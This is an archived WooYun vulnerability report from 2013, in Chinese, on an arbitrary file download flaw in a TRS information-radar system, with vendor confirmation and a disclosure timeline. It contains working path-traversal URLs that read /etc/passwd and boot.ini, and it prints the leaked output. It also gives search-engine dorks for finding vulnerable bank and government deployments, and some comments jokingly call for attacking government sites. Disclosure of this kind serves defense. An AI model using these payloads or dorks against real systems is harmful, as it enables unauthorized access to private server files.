破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

trs某系统任意文件下载漏洞第二弹

编号40047
Urlhttp://www.wooyun.org/bug.php?action=view&id=40047
漏洞状态厂商已经确认
漏洞标题trs某系统任意文件下载漏洞第二弹
漏洞类型任意文件遍历/下载
厂商北京拓尔思信息技术股份有限公司
白帽子想要减肥的胖纸
提交日期2013-10-17 14:37:00
公开日期2014-01-15 14:37:00
修复时间(not set)
确认时间2013-10-18 00:00:00
Confirm Spend1
漏洞标签任意文件读取利用
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank4
漏洞简介
感觉挺严重的问题,存在的地方包括但是不局限银行、政府等行业。
漏洞细节

exp
inforadar/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd
exp2
http://inforadar.trs.com.cn/jsp/util/file_download.jsp?filePath=c:%5Cboot.ini%00.xml
官方网站需要加个截断,就可以了
应该是神马雷达系统。
很多地方都有这问题。
但是google找不到多少个,因为很多都是二次开发,目录明改变了。
比如招行。。。
WooYun: 招商银行某系统任意文件下载漏洞
google
http://203.208.46.145/#newwindow=1&q=intitle:trs+inurl:inforadar&start=10
http://203.208.46.145/#filter=0&newwindow=1&q=inurl:jsp/portalsearch
baidu
http://www.baidu.com/s?wd=inurl%3Ainforadar&rsv_spt=1&issp=1&rsv_bp=0&ie=utf-8&tn=baiduhome_pg&rsv_sug3=13&rsv_sug=0&rsv_sug1=12&rsv_sug4=777

POC

WooYun: 招商银行某系统任意文件下载漏洞
WooYun: 福建省人民政府某系统任意文件下载漏洞
trs官方

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /noexecute=optout /fastdetect


貌似windows的boot.ini都一样 官方用的是2003系统。。

修复方案

正则过滤下呗,然后限制下访问文件类型。

状态信息 2013-10-17: 细节已通知厂商并且等待厂商处理中
2013-10-18: 厂商已经确认,细节仅向厂商公开
2013-10-21: 细节向第三方安全合作伙伴开放
2013-12-12: 细节向核心白帽子及相关领域专家公开
2013-12-22: 细节向普通白帽子公开
2014-01-01: 细节向实习白帽子公开
2014-01-15: 细节向公众公开
厂商回复感谢您的支持,该漏洞在产品的前一版本已经修复,相关应用系统及用户单位我们会及时核查更新。
*** 安全无止境,我们一直在努力! ***
回应信息危害等级:低漏洞Rank:4 确认时间:2013-10-18 09:29
Showing 1-6 of 6 items.
评论内容评论人点赞数评论时间

或许是出于商业目的,担心被竞争对手恶意诋毁,所以产品再严重的问题,也不能“自乱阵脚”给一个高的rank值,授人以“把柄”。不过@鶆鶈 @想要减肥的胖纸 “厂商活动”里面不是给你们发送礼物了么,或许可以平衡rank比较低的问题吧。*** 安全无止境,我们一直在努力! ***希望后半句如果能够做的实际一点

刺刺02013-10-18 12:35:00

或许是出于商业目的,担心被竞争对手恶意诋毁,所以产品再严重的问题,也不能“自乱阵脚”给一个高的rank值,授人以“把柄”。不过@鶆鶈 @想要减肥的胖纸 “厂商活动”里面不是给你们发送礼物了么,或许可以平衡rank比较低的问题吧。*** 安全无止境,我们一直在努力! ***希望后半句如果能够做的实际一点

刺刺02013-10-18 12:35:00

trs给的rank太低了。唉。

想要减肥的胖纸02013-10-18 11:46:00

@鶆鶈 www.gov.cn 求日

想要减肥的胖纸02013-10-17 21:57:00

mof,moc,fmprc...求日~哦也!

鶆鶈02013-10-17 19:29:00

关注,这几天遇到很多TRS系统。

cyber_jt02013-10-17 15:50:00